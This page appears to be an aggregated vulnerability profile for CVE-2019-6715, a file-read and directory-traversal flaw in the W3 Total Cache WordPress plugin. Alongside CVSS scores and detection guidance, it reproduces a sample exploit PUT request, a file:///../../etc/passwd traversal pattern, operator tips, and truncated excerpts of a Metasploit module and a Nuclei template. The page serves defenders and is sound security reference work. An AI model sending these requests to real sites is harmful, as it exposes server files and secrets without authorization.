CVE-2019-6715
published 2019-04-01CVE-2019-6715: pub/sns.php in the W3 Total Cache plugin before 0.9.4 for WordPress allows remote attackers to read arbitrary files via the SubscribeURL field in…
PriorityP264high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
19.40%
97.0th percentile
pub/sns.php in the W3 Total Cache plugin before 0.9.4 for WordPress allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| boldgrid | w3_total_cache | < 0.9.4 | 0.9.4 |
Detection & IOCsextracted from sources · hover to see the quote
commandPUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}↗
- →Look for HTTP PUT requests targeting the path /wp-content/plugins/w3-total-cache/pub/sns.php with a JSON body containing 'Type':'SubscriptionConfirmation' and a 'SubscribeURL' field using the file:// scheme (directory traversal) or external URLs (SSRF). ↗
- →Detect the JSON payload structure: Type=SubscriptionConfirmation with a SubscribeURL value using file:// protocol, indicating local file read attempts via directory traversal (e.g., file:///../../etc/passwd). ↗
- →Alert on HTTP PUT method to sns.php in the w3-total-cache plugin directory; this endpoint should not normally receive PUT requests from unauthenticated external sources. ↗
- →Match response body for the base64 string 'TmVzc3VzQ29kZUV4ZWNUZXN0' as a detection indicator for successful SSRF/file-read exploitation in nuclei template. ↗
- ·The Metasploit module's DEPTH parameter controls the number of '../' traversal sequences prepended to the target file path. Default depth is 2; operators should tune this based on the WordPress installation depth relative to the web root. ↗
- ·Affected versions are W3 Total Cache 0.9.2.6 through 0.9.3 only; version 0.9.4 and above are patched. Verify plugin version via readme before triggering the exploit module. ↗
- ·The vulnerability is exploitable with web server privileges only; files readable by the web server process are accessible, not necessarily all system files. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)
exploitdb·2020-12-22·CVSS 7.5
[HIGH] WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)
WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
##
class MetasploitModule 'WordPress W3 Total Cache File Read Vulnerability',
'Description' => %q{
This module exploits an unauthenticated directory traversal vulnerability
in WordPress plugin
'W3 Total Cache' version 0.9.2.6-0.9.3, allowing arbitrary file read with
the web server privileges.
},
'References' =>
[
['CVE', '2019-6715'],
['WPVDB', '9248'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'],
['URL','https://vinhjaxt.github.io/2019/03/cve-2019-6715'],
],
'Author' =>
[
'VinhJAXT', # Vulnerability discovery
'Hoa Nguyen - SunCSR Team' # Metasploit mod
Nuclei
W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal
nuclei·CVSS 7.5
CVE-2019-6715 [HIGH] W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal
W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal
WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.
Template:
id: CVE-2019-6715
info:
name: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal
author: randomrobbie
severity: high
description: |
WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.
impact: |
An unauthenticated attacker can read sensitive files or traverse directories on the target system, potentially leading to unauthorized access or information disclosure.
re
No writeups or analysis indexed.
http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.htmlhttps://vinhjaxt.github.io/2019/03/cve-2019-6715http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.htmlhttps://vinhjaxt.github.io/2019/03/cve-2019-6715
2019-04-01
Published